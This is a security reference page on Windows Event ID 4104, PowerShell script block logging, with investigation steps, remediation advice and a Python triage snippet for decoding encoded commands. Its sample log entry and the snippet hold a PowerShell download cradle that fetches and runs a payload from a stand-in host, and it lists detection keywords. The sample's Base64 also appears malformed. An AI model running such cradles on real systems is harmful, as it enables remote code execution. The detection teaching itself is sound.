EventPeeker

Event ID 4104 — PowerShell Script Block Logging

Event ID 4104 captures the full content of PowerShell scripts as they execute, including de-obfuscated code. When script block logging is enabled, this event is invaluable for detecting PowerShell-based attacks — encoded commands, download cradles, and in-memory execution.

MITRE ATT&CK

Technique: T1059.001 · PowerShell
Tactic: Execution


Security Relevance

PowerShell is one of the most commonly abused tools in modern attacks because it is built into Windows, trusted by security controls, and capable of doing almost anything. Attackers use PowerShell to download payloads, execute shellcode in memory, dump credentials, and move laterally — often without writing files to disk. Script block logging captures this activity even when attackers use obfuscation.

Example Log Entry

Log Name: Microsoft-Windows-PowerShell/Operational
Source:    Microsoft-Windows-PowerShell
Event ID:  4104
Level:     Warning

Creating Scriptblock text (1 of 1):
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand
  aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnaHR0cDovL21hbGljaW91cy5jb20vcGF5bG9hZC5wczEn

ScriptBlock ID: {a1b2c3d4-e5f6-7890-abcd-ef1234567890}

Investigation Steps

  1. Look for these keywords in script content: Invoke-Expression, IEX, DownloadString, DownloadFile, -EncodedCommand, FromBase64String, Invoke-WebRequest, Net.WebClient, -Bypass, -Hidden, -WindowStyle Hidden.
  2. Decode any Base64-encoded commands — use CyberChef or PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('...'))
  3. Check the source — what process spawned PowerShell? Office applications, wscript.exe, or mshta.exe are red flags.
  4. Look for network connections made by PowerShell at the same time (check firewall/proxy logs).
  5. Check if the script executed in memory only (no file written to disk) — this is fileless malware.
  6. Review the user context — was this a privileged account? Was the session interactive or remote?
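Steps 1 and 2 above can be automated for bulk triage of exported 4104 events. The following is an added example, not part of the original page or any EventPeeker code: it pulls the -EncodedCommand token out of a ScriptBlockText value, decodes it as Base64 over UTF-16LE (the encoding powershell.exe expects), and reports which of the keywords listed above appear in the raw or decoded text. The sample event text and the example.invalid URL are constructed for the demonstration.

```python
import base64
import re
from typing import Optional

# Keyword list from the investigation steps above; matched case-insensitively
# and only as whole tokens so "IEX" does not fire inside unrelated words.
SUSPICIOUS_KEYWORDS = [
    "Invoke-Expression", "IEX", "DownloadString", "DownloadFile",
    "-EncodedCommand", "FromBase64String", "Invoke-WebRequest",
    "Net.WebClient", "-Bypass", "-Hidden", "-WindowStyle Hidden",
]
_KW_RES = [re.compile(r"(?<![\w-])" + re.escape(k) + r"(?!\w)", re.I) for k in SUSPICIOUS_KEYWORDS]

# -EncodedCommand and its prefix abbreviations (-e, -ec, -enc) followed by one base64 token.
_ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode an -EncodedCommand argument: Base64 over UTF-16LE text.
    Returns None when the token is not valid Base64 or not UTF-16LE."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)  # restore padding lost in copy/paste
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage_script_block(script_block_text: str) -> dict:
    """Triage one 4104 ScriptBlockText: decode any encoded command and
    report which suspicious keywords appear in the raw or decoded text."""
    decoded = None
    match = _ENC_RE.search(script_block_text)
    if match:
        decoded = decode_encoded_command(match.group(1))
    haystack = script_block_text + ("\n" + decoded if decoded else "")
    hits = [k for k, rx in zip(SUSPICIOUS_KEYWORDS, _KW_RES) if rx.search(haystack)]
    return {"decoded": decoded, "hits": hits}


# Constructed sample (not a real capture): a download cradle like the one in the
# example entry above, encoded the way powershell.exe expects, in a 4104-style block.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"
SAMPLE_4104 = (
    "powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand\n  "
    + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
)
```

Run triage_script_block over each event's ScriptBlockText (for example from an EVTX export) and alert on any non-empty hits list; the decoded text is what you should read, since the raw event only shows the Base64.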


Remediation

  • Enable PowerShell Constrained Language Mode via AppLocker or WDAC to limit what scripts can do.
  • Ensure script block logging is enabled via Group Policy: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell.
  • Enable PowerShell transcription logging for additional context.
  • Block PowerShell from being spawned by Office applications via Attack Surface Reduction rules.
  • Consider allowing only signed scripts via execution policy (though this alone is not a security control).
  • Investigate the full scope — PowerShell attacks are rarely isolated; look for lateral movement and persistence.

Related Event IDs

  • 4103 · PowerShell module logging — logs all pipeline executions
  • 4688 · Process created — see how PowerShell was launched and by what parent
  • 4698 · Scheduled task created — PowerShell often used to install persistence
  • 4624 · Successful logon — establish what session ran the script
